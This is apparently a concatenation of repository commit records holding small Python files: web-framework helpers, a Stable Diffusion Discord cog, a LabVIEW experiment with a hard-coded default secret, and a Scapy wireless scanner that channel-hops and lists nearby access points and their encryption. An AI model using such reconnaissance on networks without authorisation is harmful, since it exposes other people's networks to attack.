# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python | |
1199bba46cc16ec1285ab9d58fa1c74e9061f874 | Create PedidoDeletar.py | AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb | backend/Models/Predio/PedidoDeletar.py | backend/Models/Predio/PedidoDeletar.py | from Framework.Pedido import Pedido
from Framework.ErroNoHTTP import ErroNoHTTP


class PedidoDeletar(Pedido):
    """Request wrapper for delete operations; extracts the target id."""

    def __init__(self, variaveis_do_ambiente):
        super(PedidoDeletar, self).__init__(variaveis_do_ambiente)
        try:
            self.id = self.corpo['id']
        except (TypeError, KeyError):
            # Bug fix: the bare ``except:`` swallowed every error.  Only a
            # missing/malformed body should map to 400 Bad Request.
            raise ErroNoHTTP(400)

    def getId(self):
        """Return the id extracted from the request body."""
        return self.id
| mit | Python | |
8561fba46509db7f74f9770d71dd0ba41e4cb594 | Add bids.ext namespace package for subpackages | INCF/pybids | bids/ext/__init__.py | bids/ext/__init__.py | __path__ = __import__('pkgutil').extend_path(__path__, __name__)
| mit | Python | |
a75b7cf5634e580b78c5f4cad9255735982b51d1 | bump to 0.9.3 | loandy/billy,loandy/billy,sunlightlabs/billy,sunlightlabs/billy,loandy/billy,mileswwatkins/billy,openstates/billy,openstates/billy,sunlightlabs/billy,mileswwatkins/billy,mileswwatkins/billy,openstates/billy | billy/__init__.py | billy/__init__.py | __version__ = '0.9.3'
from billy.conf import settings


class LazyDb(object):
    """Proxy that defers the MongoDB connection until first attribute use."""

    def __init__(self):
        self._db = None

    def __getattr__(self, attr):
        # Connect lazily on first access, then delegate every lookup to the
        # underlying pymongo database object.
        if not self._db:
            import pymongo
            connection = pymongo.Connection(settings.MONGO_HOST,
                                            settings.MONGO_PORT)
            self._db = connection[settings.MONGO_DATABASE]
        return getattr(self._db, attr)

db = LazyDb()
| __version__ = '0.9.2'
from billy.conf import settings
class LazyDb(object):
def __init__(self):
self._db = None
def __getattr__(self, attr):
if not self._db:
import pymongo
host = settings.MONGO_HOST
port = settings.MONGO_PORT
db_name = settings.MONGO_DATABASE
conn = pymongo.Connection(host, port)
self._db = conn[db_name]
return getattr(self._db, attr)
db = LazyDb()
| bsd-3-clause | Python |
ac9bcdea0ece3e34943471336499f42213ef5c47 | Create zinnia_markitup module | django-blog-zinnia/zinnia-wysiwyg-markitup,django-blog-zinnia/zinnia-wysiwyg-markitup | zinnia_markitup/__init__.py | zinnia_markitup/__init__.py | """MarkItUp for Django-blog-zinnia"""
| bsd-3-clause | Python | |
d61fc5b219186824b8b198c5a4679602372039da | Create leapBasic.py | MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab | home/Alessandruino/leapBasic.py | home/Alessandruino/leapBasic.py | leap = Runtime.start("leap","LeapMotion")
# Subscribe this MyRobotLab Python script to the LeapMotion service's
# tracking events ("leap" was started on the line above; `python` is the
# script service provided by the MyRobotLab Jython environment).
leap.addLeapDataListener(python)
# Callback invoked by the LeapMotion service for each tracking frame;
# prints the right hand's index-finger data.
def onLeapData(data):
print (data.rightHand.index)
leap.startTracking()
| apache-2.0 | Python | |
c25c0a9942345ed46d8091f7705cb26bbb21dfe5 | add plugin test cases | ssato/python-anyconfig-pyjavaproperties-backend,ssato/python-anyconfig-pyjavaproperties-backend | tests/plugin.py | tests/plugin.py | #
# Copyright (C) 2017 Satoru SATOH <satoru.satoh @ gmail.com>
# License: MIT
#
# pylint: disable=missing-docstring,invalid-name
from __future__ import absolute_import
import os.path
import os
import unittest
import anyconfig
_CURDIR = os.path.dirname(__file__)
class Test(unittest.TestCase):
conf_path = os.path.join(_CURDIR, "0.properties")
def test_20_load(self):
conf = anyconfig.load(self.conf_path)
self.assertEquals(conf['b'], "bbb", conf)
# vim:sw=4:ts=4:et:
| mit | Python | |
c4bad78b508369e7ef1c682114c0b04340ed371b | Create an abstract Player class | mbrookes1304/Dudo | Player.py | Player.py | from abc import ABCMeta, abstractmethod
from Dice import Dice


class Player(object):
    """An abstract Dudo player"""
    __metaclass__ = ABCMeta

    def __init__(self, name):
        self._name = name
        # Every player starts the game holding five dice.
        self._diceset = set()
        for _ in range(5):
            self._diceset.add(Dice())

    def getName(self):
        """Returns the players name."""
        return self._name

    def getDiceSet(self):
        """Return the set of dice belonging to player."""
        return self._diceset

    def removeDice(self):
        """Returns the set of dice after one is removed."""
        # set.pop discards an arbitrary die from the hand.
        self._diceset.pop()
        return self._diceset

    def addDice(self):
        """Returns the set of dice after one is added.
        Player cannot have more than five dice."""
        if len(self._diceset) < 5:
            self._diceset.add(Dice())
        return self._diceset

    def rollAllDice(self):
        """Rolls all dice belonging to player."""
        for die in self._diceset:
            die.roll()

    def isEliminated(self):
        """Returns true iff the player has no dice left."""
        return len(self._diceset) == 0

    @abstractmethod
    def takeTurn(self):
        """Returns the bid made by the player."""
        pass

    def __repr__(self):
        return self._name + str(self._diceset)
| mit | Python | |
a9ec0b508f9d59d0c920a53141d25de0d6eb1c5f | work in progress | SageBerg/LearnYouATypist,SageBerg/LearnYouATypist,SageBerg/LearnYouATypist | make_lessons.py | make_lessons.py | # -*- coding: utf-8 -*-
"""Split a text file into cleaned, 10-line typing lessons."""
import sys


def make_lesson():
    """Print the file named by argv[1] in cleaned, 10-line chunks."""
    # `with` guarantees the file is closed (the original leaked the handle).
    with open(sys.argv[1]) as f:
        text = ""
        count = 0
        for line in f:
            text += line
            count += 1
            if count > 9:
                count = 0
                print(clean(text) + "\n")
                text = ""
    # Bug fix: the trailing partial chunk was printed without clean().
    print(clean(text))


def clean(text):
    """Replace curly quotes and dashes with their ASCII equivalents."""
    text = text.replace("’", "\'")
    text = text.replace("“", "\"")
    text = text.replace("”", "\"")
    text = text.replace("–", "-")
    text = text.replace("—", "-")
    return text


if __name__ == "__main__":
    # Guarded so importing this module does not require argv / run I/O.
    make_lesson()
| apache-2.0 | Python | |
54afce985f7f24e74cd5796e12e3c5f2c4616590 | Add Python script to generate (huge) test dumps. | CoolV1994/zPermissions,TWSSYesterday/zPermissions,TWSSYesterday/zPermissions,CoolV1994/zPermissions,ZerothAngel/zPermissions,ZerothAngel/zPermissions | etc/gen-test-dump.py | etc/gen-test-dump.py | #!/usr/bin/env python
import random
# Tunables for the generated permissions dump.  The None padding in the
# world/region pools weights the random draw towards "no qualifier".
WORLDS = [None] * 8 + ['world', 'world_nether', 'creative', 'hardcore']
REGIONS = [None] * 20 + ['Region%d' % i for i in range(10)]
NUM_PLAYERS = 100
NUM_PERMISSIONS_PER_PLAYER = 50
NUM_GROUPS = (3, 13, 23, 31, 41)  # group count per nesting depth
NUM_PERMISSIONS_PER_GROUP = 50
NUM_PLAYERS_PER_GROUP = 50
PLAYER_MEMBER_POOL_SIZE = 1000
# groups_at_depth[d] collects the names of groups created at depth d so
# that deeper groups can pick a random parent one level up.
groups_at_depth = []
for i in range(len(NUM_GROUPS)):
    groups_at_depth.append([])
def generate_permissions(name, is_group, count):
    """Emit *count* `permissions ... set ...` commands for one player/group.

    Each permission gets a randomly chosen (possibly empty) region and
    world qualifier drawn from the module-level pools.
    """
    kind = 'group' if is_group else 'player'
    for idx in range(count):
        region = REGIONS[random.randint(0, len(REGIONS) - 1)]
        region = '' if region is None else region + '/'
        world = WORLDS[random.randint(0, len(WORLDS) - 1)]
        world = '' if world is None else world + ':'
        print('permissions %s %s set %s%spermission.%s.%d true' % (
            kind,
            name,
            region,
            world,
            name,
            idx))
def generate_group(name, depth):
    """Create group *name* at *depth*, parenting it under a random group
    one level up (depth 0 groups have no parent), and record it in
    groups_at_depth so deeper groups can reference it.
    """
    print('permissions group %s create' % name)
    if depth > 0:
        # Pick a random parent among the groups of the previous depth.
        candidates = groups_at_depth[depth - 1]
        parent = candidates[random.randint(0, len(candidates) - 1)]
        print('permissions group %s setparent %s' % (name, parent))
    assert name not in groups_at_depth[depth]
    groups_at_depth[depth].append(name)
def generate_members(name, count):
    """Add *count* randomly chosen pool players to group *name*."""
    for _ in range(count):
        member = random.randint(0, PLAYER_MEMBER_POOL_SIZE - 1)
        print('permissions group %s add TestPlayer%d' % (name, member))
def main():
    """Drive the dump: player permissions first, then groups level by level."""
    for idx in range(NUM_PLAYERS):
        generate_permissions('TestPlayer%d' % idx, False,
                             NUM_PERMISSIONS_PER_PLAYER)
    group_count = 0
    for depth, num_at_depth in enumerate(NUM_GROUPS):
        for _ in range(num_at_depth):
            group_name = 'TestGroup%d' % group_count
            group_count += 1
            generate_group(group_name, depth)
            generate_permissions(group_name, True, NUM_PERMISSIONS_PER_GROUP)
            generate_members(group_name, NUM_PLAYERS_PER_GROUP)
# Allow use both as a script and as an importable module.
if __name__ == '__main__':
    main()
| apache-2.0 | Python | |
f264a4a15682467549326cc530c152f647bf7832 | Add a convenience python script to inline the imports of a file. | JasonGross/catdb,CategoricalData/catdb,CategoricalData/catdb,JasonGross/catdb | replace_imports.py | replace_imports.py | from __future__ import with_statement
import os
# Memoisation caches, keyed by the normalised ('.v'-suffixed) file name.
file_contents = {}
file_imports = {}
def get_file(file_name):
    """Return (and memoise) the text of *file_name*, appending '.v' if absent."""
    if file_name[-2:] != '.v':
        file_name += '.v'
    if file_name not in file_contents:
        print(file_name)
        try:
            with open(file_name, 'r', encoding='UTF-8') as f:
                file_contents[file_name] = f.read()
        except TypeError:
            # Python 2's open() has no *encoding* keyword argument.
            with open(file_name, 'r') as f:
                file_contents[file_name] = f.read()
    return file_contents[file_name]
def get_imports(file_name):
    """Return the sorted tuple of names imported by *file_name* (memoised).

    Scans Coq-style 'Require'/'Import' lines and strips the
    Require/Import/Export keywords to leave bare module names.
    """
    if file_name[-2:] != '.v':
        file_name += '.v'
    if file_name not in file_imports:
        import_lines = []
        for line in get_file(file_name).split('\n'):
            stripped = line.strip()
            if stripped.startswith('Require ') or stripped.startswith('Import '):
                import_lines.append(line.strip('. '))
        joined = ' ' + ' '.join(import_lines)
        joined = joined.replace(' Require ', ' ').replace(' Import ', ' ').replace(' Export ', ' ')
        file_imports[file_name] = tuple(sorted(set(joined.strip().split(' '))))
    return file_imports[file_name]
def merge_imports(*imports):
    """Concatenate import lists, dropping duplicates while preserving
    first-seen order.

    Uses a seen-set for O(1) membership tests instead of the original
    O(n) `in list` scan (items here are module-name strings, hashable).
    """
    seen = set()
    rtn = []
    for import_list in imports:
        for i in import_list:
            if i not in seen:
                seen.add(i)
                rtn.append(i)
    return rtn
def recursively_get_imports(file_name):
    """Return the transitive import list of *file_name*, depth-first,
    ending with the file itself (without the '.v' suffix)."""
    if file_name[-2:] != '.v':
        file_name += '.v'
    base = file_name[:-2]
    if not os.path.exists(file_name):
        # Not locally available: nothing to recurse into.
        return [base]
    child_lists = [recursively_get_imports(dep) for dep in get_imports(file_name)]
    return merge_imports(*child_lists) + [base]
def contents_without_imports(file_name):
    """Return the file's text with every Require/Import line removed."""
    if file_name[-2:] != '.v':
        file_name += '.v'
    kept = []
    for line in get_file(file_name).split('\n'):
        stripped = line.strip()
        if not (stripped.startswith('Require ') or stripped.startswith('Import ')):
            kept.append(line)
    return '\n'.join(kept)
def include_imports(file_name):
    """Inline every locally available transitive import into one source
    blob; imports that cannot be found stay as a leading Require line."""
    if file_name[-2:] != '.v':
        file_name += '.v'
    remaining_imports = []
    body = ''
    for import_name in recursively_get_imports(file_name):
        if os.path.exists(import_name + '.v'):
            body += contents_without_imports(import_name)
        else:
            remaining_imports.append(import_name)
    return 'Require Import %s.\n%s' % (' '.join(remaining_imports), body)
| mit | Python | |
fa067ee22e89111848536c7fa9396575a8f31ac6 | add testhttp.py. | kurniawano/pythymiodw | examples/testhttp.py | examples/testhttp.py | from pythymiodw import ThymioReal
# Connect to a physical Thymio-II robot (requires the backend bridge running).
t = ThymioReal()
# Drive both wheels forward at speed 100 for one second, then disconnect.
t.wheels(100,100)
t.sleep(1)
t.quit()
5c40193fe8bce5601190223503d27e73cb8dff39 | Create zip.py | DataMonster/Python | exer/zipunzip/zip.py | exer/zipunzip/zip.py | def zip(*arg):
Result = []
Check = 1
#check if every item in arg has the same length
for i in arg:
if len(i) != len(arg[0]):
print 'please make sure enter all items with the same length'
Check = 0
break
while (Check):
for j in range(0,len(arg[0])):
result = ()
for item in arg:
result = result + (item[j],)
Result.append(result)
Check = 0
return Result
def unzip(x):
    """Invert zip(): turn a list of rows into a tuple of column lists.

    Column count is taken from the first row; each row must be at least
    that long.
    """
    columns = [[] for _ in range(len(x[0]))]
    for row in x:
        for j, col in enumerate(columns):
            col.append(row[j])
    return tuple(columns)
def Test():
    """Ad-hoc demo of zip()/unzip(); prints expressions and their results.

    Python 2 style multi-argument print statements; #2 checks that
    unzip(zip(...)) round-trips back to the original columns.
    """
    print '#1 test: '
    print ' zip([1,1,1],[2,2,2],[3,3,3],[4,4,4]) -->', zip([1,1,1],[2,2,2],[3,3,3],[4,4,4])
    print '\n'
    print ' unzip([(1,2,3,4,5),(2,3,4,5,6),(3,4,5,6,7)]) -->', unzip([(1,2,3,4,5),(2,3,4,5,6),(3,4,5,6,7)])
    print '\n'
    print '#2 test: unzip(zip([100,200,300],[200,300,400],[0,0,0]))'
    print unzip(zip([100,200,300],[200,300,400], [0,0,0]))
    print '\n'
Test()
| unlicense | Python | |
6701b9001b85b440f1cea8bdca5f93fb9abbf9b8 | Add buzzer1 script(node) | DaisukeUra/pimouse_ros,DaisukeUra/pimouse_ros | scripts/buzzer1.py | scripts/buzzer1.py | #!/usr/bin/env python
import rospy
# Register this process with the ROS master under the name 'buzzer'.
rospy.init_node('buzzer')
# Block until the node is shut down (Ctrl-C / rosnode kill).
rospy.spin()
| bsd-3-clause | Python | |
4f9db89ea1beae50c27f00f4e52279af60987df2 | Set up sprint template script | rdocking/bits_and_bobs | sprint_template.py | sprint_template.py | #!/usr/bin/env python
# encoding: utf-8
"""
sprint_template.py
Created by Rod Docking on 2016-12-28.
Copyright (c) 2016 Canada's Michael Smith Genome Sciences Centre.
All rights reserved.
"""
import sys
import os
import argparse
# Markdown/pandoc skeleton emitted by main(); $NUM/$X/$Y/$Z and the
# YYYY-MM-DD dates are placeholders filled in by hand after generation.
SPRINT_TEMPLATE = """---
title: "Sprint $NUM: Witty Subtitle"
author: "Rod Docking"
date: 'YYYY-MM-DD'
csl: ../../references/csl/apa.csl
bibliography: ../../references/paperpile_export.bib
---
## Current Sprint
- What are the goals for the current sprint?
- Current analysis:
- ✅ Done ticket (**POINTS**)
- ⏩ In-progress ticket (**POINTS**)
- ◽ Open ticket (**POINTS**)
- Thesis planning:
- Planning task (**NUM x CATEGORY**)
- Current reading:
- Reading task (**NUM x CATEGORY**)
- Background reading:
- Reading task (**NUM x CATEGORY**)
- Meta and Admin:
- Admin task (**NUM x CATEGORY**)
- Support:
- Support task (**NUM x CATEGORY**)
## Agile Metrics Tracking
### Story Points
| | Last Sprint | Estimate | Actual |
|:-------------------|:------------|:---------------------------------------------|:-------|
| Meeting-free hours | | (8.0hrs/day * 10 days) - (meetings in hours) | |
| Story points | | | |
### Story Points and Intervals
- Estimates:
- Week 1: $Xh committed
- Week 2: $Yh committed
- Estimate of meeting-free hours: 80 - ($X + $Y) = $Zh
- Estimated potential points from `sprint_estimation_tables.rmd`
- Story points assigned at sprint planning meeting:
- Actual:
- Week 1: $Xh committed
- Week 2: $Yh committed
- Actual meeting-free hours: 80 - ($X + $Y) = $Zh
- Story points completed:
- Intervals Goal: (16 * number of working days)
- Interval Targets:
| Category | Estimate | Daily | Actual | Diff |
|:-------------------------------|:---------|:------|:-------|:-----|
| Meta | | | | |
| Current Analysis | | | | |
| Current Reading | | | | |
| Background Reading | | | | |
| Meetings and Seminars | | | | |
| Informatics Support | | | | |
| Scanning, Networking, Browsing | | | | |
| **SUM** | | | | |
## Schedule
### Week 1 - YYYY-MM-DD - YYYY-MM-DD
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
### Week 2 - YYYY-MM-DD - YYYY-MM-DD
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
## Progress
### Papers Read
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
### Analysis Tickets Completed
- JIRA tickets completed
### Other Accomplishments
- Other noteworthy things that happened
### Push to Next Sprint or Drop
- Things that were dropped at the planning meeting
- Things that were consciously dropped mid-sprint
## Retrospective
- Retrospective thoughts on the sprint
## References
"""
def _parse_args():
parser = argparse.ArgumentParser(
description="""Sprint Planning Template""")
parser.add_argument(
'-s', '--sprint_num', type=int,
help='Sprint number', required=True)
parser.add_argument(
'sprint_title', help='Sprint title')
args = parser.parse_args()
return args
def main():
    """Entry point: validate arguments, then emit the sprint skeleton."""
    # Arguments are only validated for now; they are not yet substituted
    # into the template placeholders.
    _parse_args()
    print(SPRINT_TEMPLATE)
# Allow use both as a script and as an importable module.
if __name__ == '__main__':
    main()
| mit | Python | |
3fc4f4305f59e3dc42478e1b0812aeaa1eee91fa | Add labview_remote_panels | morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto | server/src/experiments/labview_remote_panels.py | server/src/experiments/labview_remote_panels.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo.orduna@deusto.es>
#
import base64
import socket
import time
import random
import traceback
import urllib2
import json
import threading
import weakref
from voodoo import log
from voodoo.lock import locked
from voodoo.log import logged
from voodoo.override import Override
from weblab.experiment.experiment import Experiment
import weblab.core.coordinator.coordinator as Coordinator
DEFAULT_DEBUG_MESSAGE = True
DEFAULT_DEBUG_COMMAND = True
class LabviewRemotePanels(Experiment):
    """WebLab experiment that proxies a LabVIEW Remote Panels server over
    a simple line-oriented TCP protocol.

    Fixes over the original: `if if` syntax error in _dbg_command, wrong
    parameter/global names in do_start_experiment (serialized_client_initial_data,
    server_data), bare `_send_message`/`WEBLAB_SECRET` instead of the
    instance attributes, and `Override(Experiment.Experiment)` where the
    import only provides `Experiment`.
    """

    def __init__(self, coord_address, locator, config, *args, **kwargs):
        super(LabviewRemotePanels, self).__init__(*args, **kwargs)
        self.host = config.get('labview_host', 'localhost')
        self.port = config.get('labview_port', 20000)
        self.shared_secret = config.get('labview_shared_secret', "12345@&")
        self.debug_message = config.get('labview_debug_message', DEFAULT_DEBUG_MESSAGE)
        self.debug_command = config.get('labview_debug_command', DEFAULT_DEBUG_COMMAND)
        if self.debug_message or self.debug_command:
            print("LabVIEW Configuration: {}:{} key: {}".format(self.host, self.port, self.shared_secret))

    def _dbg_message(self, msg):
        # Low-level socket tracing.
        if self.debug_message:
            print(msg)

    def _dbg_command(self, msg):
        # Command-level tracing.
        if self.debug_command:
            print(msg)

    def _send_message(self, message):
        """Send one CRLF-terminated message and return the raw response."""
        message = message + '\r\n'
        self._dbg_message("Creating socket")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._dbg_message("Connecting...")
        s.connect((self.host, self.port))
        self._dbg_message("Connected. Sending message: %s" % message)
        s.send(message)
        self._dbg_message("Message sent")
        self._dbg_message("Waiting for response")
        response = s.recv(1024)
        self._dbg_message("Response received: %r" % response)
        self._dbg_message("Closing socket")
        s.close()
        self._dbg_message("Socket closed")
        return response

    @Override(Experiment)
    @logged("info")
    def do_start_experiment(self, client_initial_data, server_initial_data):
        """Ask the LabVIEW server for a session URL for this user."""
        raw_back_url = json.loads(client_initial_data).get('back', '')
        back_url = urllib2.quote(raw_back_url, '')
        data = json.loads(server_initial_data)
        username = data['request.username']
        time_slot = int(data['priority.queue.slot.length'])
        self.current_client_key = str(random.random())[2:7]
        message = '@@@'.join(('start', self.shared_secret, self.current_client_key, username, back_url, str(time_slot)))
        json_response = self._send_message(message)
        response = json.loads(json_response)
        current_config = {
            'url': response['url'],
        }
        return json.dumps({"initial_configuration": json.dumps(current_config), "batch": False})

    @Override(Experiment)
    def do_should_finish(self):
        """Poll the LabVIEW server; non-positive answers mean 'ask again in 10s'."""
        message = '@@@'.join(('status', self.shared_secret))
        json_response = self._send_message(message)
        if not json_response:
            return 10
        try:
            response = int(json_response)
        except ValueError:
            return 10
        else:
            return response

    @Override(Experiment)
    def do_dispose(self):
        """Tell the LabVIEW server the session has ended."""
        message = '@@@'.join(('end', self.shared_secret))
        self._send_message(message)
        return 'ok'
| bsd-2-clause | Python | |
963c0479b22e1cc142b015b5afdccfb8c35aa4b6 | Add initial SD cog | Naught0/qtbot | cogs/diffusion.py | cogs/diffusion.py | import asyncio
import backoff
from typing import Any, Literal
from discord import Embed
from discord.ext import commands
from aiohttp import ClientResponseError
from bot import QTBot
from utils.custom_context import CustomContext
class DiffusionError(Exception):
    """Raised when the Replicate API reports an error in its payload."""
    pass
class Diffusion(commands.Cog):
    """Discord cog that submits Stable Diffusion jobs to Replicate and
    polls until an image URL is available.

    Fix: the poll loop called `asyncio.sleep(2)` without awaiting it, so
    the coroutine was never executed and the loop spun without pausing.
    """

    # Base request body; the prompt is merged in per-job.
    INPUT = {
        "input": {
            "width": 512,
            "height": 512,
            "num_outputs": "1",
            "guidance_scale": 7.5,
            "prompt_strength": 0.8,
            "num_inference_steps": 50,
        }
    }
    URL = "https://replicate.com/api/models/stability-ai/stable-diffusion/versions/a9758cbfbd5f3c2094457d996681af52552901775aa2d6dd0b17fd15df959bef/predictions"

    def __init__(self, bot: QTBot):
        self.bot = bot

    @backoff.on_exception(backoff.expo, ClientResponseError, max_tries=3)
    async def req(
        self, verb: Literal["GET", "POST"], url: str = "", params: dict = None, headers: dict = None, data: dict = None
    ) -> Any:
        """Issue one HTTP request against the API, retrying on HTTP errors."""
        resp = await self.bot.aio_session.request(verb, f"{self.URL}{url}", params=params, headers=headers, json=data)
        resp.raise_for_status()
        return await resp.json()

    async def start_job(self, prompt: str) -> str:
        """Create a prediction for *prompt* and return its job UUID."""
        # NOTE(review): the prompt sits next to "input" rather than inside
        # it — confirm this matches the Replicate request schema.
        payload = {**self.INPUT, "prompt": prompt}
        resp = await self.req("POST", data=payload)
        if resp["error"]:
            raise DiffusionError(resp["error"])

        return resp["uuid"]

    async def check_progress(self, id: str) -> str:
        """Poll job *id* every 2s (max 10 tries) and return the image URL."""
        total_checks = 0
        while True:
            resp = (await self.req("GET", f"/{id}"))["prediction"]
            if total_checks >= 10:
                raise asyncio.TimeoutError("Couldn't get a result after 20 seconds. Aborting.")

            if resp["error"]:
                raise DiffusionError(resp["error"])

            if resp["completed_at"]:
                return resp["output"][0]

            total_checks += 1
            # The original forgot the await, so the loop never slept.
            await asyncio.sleep(2)

    @commands.command(aliases=["diffuse", "sd"])
    async def diffusion(self, ctx: CustomContext, *, prompt: str) -> None:
        """User command: kick off a job, wait for it, post the result."""
        try:
            job_id = await self.start_job(prompt)
        except DiffusionError as e:
            return await ctx.error("API Error", str(e))
        except ClientResponseError as e:
            return await ctx.error("API Error", f"Received status code {e.status}\n{e.message}")

        try:
            image_url = await self.check_progress(job_id)
        except DiffusionError as e:
            return await ctx.error("API Error", str(e))
        except ClientResponseError as e:
            return await ctx.error("API Error", f"Received status code {e.status}\n{e.message}")

        return await ctx.send(f"{ctx.author.mention}: {prompt}\n{image_url}")
| mit | Python | |
68ba7f13c0a1db663d97ffc8f1601eb15cfa52b3 | Create wireless_scanner.py | rs91092/Scapy-wireless-scanner | wireless_scanner.py | wireless_scanner.py | #Implementation of a wireless scanner using Scapy library
#!/usr/bin/env python
# rs.py - Wireless AP scanner
#author rahil sharma
# date 15/3/2013 @rs
#usage python rs.py mon0
import sys, os, signal
from multiprocessing import Process
from scapy.all import *
# Module-level state shared by the sniffer callback and the SIGINT handler.
interface='' # monitor interface
aps = {} # dictionary to store unique APs
# process unique sniffed Beacons and ProbeResponses.
#haslayer packet has Dot11 layer present
#ord() string to integer ex ord('a) will give 97
def sniffAP(p):
    """Scapy sniff() callback: record and print each AP seen in a Beacon.

    Reads SSID/BSSID/channel out of the 802.11 layers and marks the AP
    'Y'/'N' depending on whether the capability string advertises the
    'privacy' (encryption) bit.
    """
    if ( (p.haslayer(Dot11Beacon))):
        ssid = p[Dot11Elt].info
        bssid = p[Dot11].addr3
        # Third Dot11Elt carries the DS parameter set; its single info
        # byte is the channel number.
        channel = int( ord(p[Dot11Elt:3].info))
        capability = p.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}\
{Dot11ProbeResp:%Dot11ProbeResp.cap%}")
        # The rendered capability string looks like
        # "short-slot+DSSS-OFDM+res15+ESS"; 'privacy' marks encryption.
        if re.search("privacy", capability): enc = 'Y'
        else: enc = 'N'
        # Save discovered AP (keyed by BSSID, so duplicates overwrite).
        aps[p[Dot11].addr3] = enc
        # Display discovered AP
        print "%02d %s %s %s" % (int(channel), enc, bssid, ssid)
# Channel hopper - we are making a channel hopper because we want to scan the whole wireless spectrum.
#first choose a random channel using randrange function
#use system to run the shell command iw dev wlan0 set channel 1
#exit when a keyboard interrupt is given CTrl+c
def channel_hopper():
    """Retune the monitor interface to a random 802.11 channel (1-14)
    once per second until interrupted."""
    while True:
        try:
            chan = random.randrange(1, 15)
            cmd = "iw dev %s set channel %d" % (interface, chan)
            os.system(cmd)
            time.sleep(1)
        except KeyboardInterrupt:
            break
# Capture interrupt signal and cleanup before exiting
#terminate is used to end the child process
#before exiting the program we will be displaying number of aps found etc.
#here Cntrl+c is used to
#signal_handler used to do clean up before the program exits
def signal_handler(signal, frame):
    """Ctrl-C handler: stop the channel hopper, print AP statistics, exit."""
    p.terminate()
    p.join()
    encrypted = len([ap for ap in aps if aps[ap] == 'Y'])
    unencrypted = len([ap for ap in aps if aps[ap] == 'N'])
    print("\n-=-=-=-=-= STATISTICS =-=-=-=-=-=-")
    print("Total APs found: %d" % len(aps))
    print("Encrypted APs : %d" % encrypted)
    print("Unencrypted APs: %d" % unencrypted)
    sys.exit(0)
#use this for command line variables
#for checking the number of command line variables and if they are in right order
if __name__ == "__main__":
    # Usage: python rs.py mon0  (a monitor-mode interface is required).
    if len(sys.argv) != 2:
        print "Usage %s monitor_interface" % sys.argv[0]
        sys.exit(1)
    interface = sys.argv[1]
    # Print the program header
    print "-=-=-=-=-=-= rs_scan.py =-=-=-=-=-=-"
    print "CH ENC BSSID SSID"
    # Start the channel hopper in a child process so sniffing and channel
    # changes run concurrently.
    p = Process(target = channel_hopper)
    p.start()
    # Route Ctrl-C (SIGINT) to the stats/cleanup handler above.
    signal.signal(signal.SIGINT, signal_handler)
    # Start the blocking scapy sniffer; sniffAP runs per captured packet.
    sniff(iface=interface,prn=sniffAP)
| mit | Python | |
01c619826a32a78c121b1ded0c6c5cf3195a0cfe | refactor currency | Go-In/go-coup,Go-In/go-coup,Go-In/go-coup,Go-In/go-coup,Go-In/go-coup | storemanage/models/Currency.py | storemanage/models/Currency.py | from django.db import models
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField
# Create your models here.
class Currency(models.Model):
    """A per-store virtual currency with free-form JSON attributes."""
    name = models.CharField(max_length=30)
    store = models.ForeignKey(User, on_delete=models.CASCADE)
    # Pass the dict *callable* (not dict()) so every row gets its own
    # fresh default; a dict() instance would be shared across all rows.
    attribute = JSONField(default=dict)
    available = models.BooleanField(default=True)

    def __str__(self):
        return self.name
| mit | Python | |
cdefa248cb481f8b8a676fd674a4290f95d15145 | Add tool to fix MP4 file timestamp from GPMF GPS clock | rambo/python-gpmf,rambo/python-gpmf | fix_mp4_timestamp.py | fix_mp4_timestamp.py | #!/usr/bin/env python3
import datetime
import shutil
import gpmf.extract
import gpmf.parse
import hachoir.editor
import hachoir.parser
import hachoir.stream
from hachoir.field import MissingField
def locate_fields_by_subpath(parser, subpath):
    """Locate mp4 fields by their subpath element name.

    Walks the atom tree depth-first, collecting every field reachable as
    ``atom[subpath]``.  Fix: the inner helper used a mutable default
    (``retlist=[]``), so results accumulated across successive calls;
    the sentinel-None idiom gives each top-level call a fresh list.
    """
    def recursive_search(atom, retlist=None):
        if retlist is None:
            retlist = []
        try:
            cd = atom[subpath]
            retlist.append(cd)
        except MissingField:
            pass
        try:
            for x in atom:
                retlist = recursive_search(x, retlist)
        except KeyError:
            # Leaf atoms raise KeyError when iterated.
            pass
        return retlist
    return recursive_search(parser)
def fix_file_timestamp(filepath, overwrite=False):
    """Rewrite the MP4's creation_date metadata to the GPS clock time.

    Scans the GoPro GPMF telemetry for the first payload with a GPS fix
    (GPSF > 0), derives the recording start time from the GPS timestamp
    (GPSU) minus the payload offset, then patches every creation_date
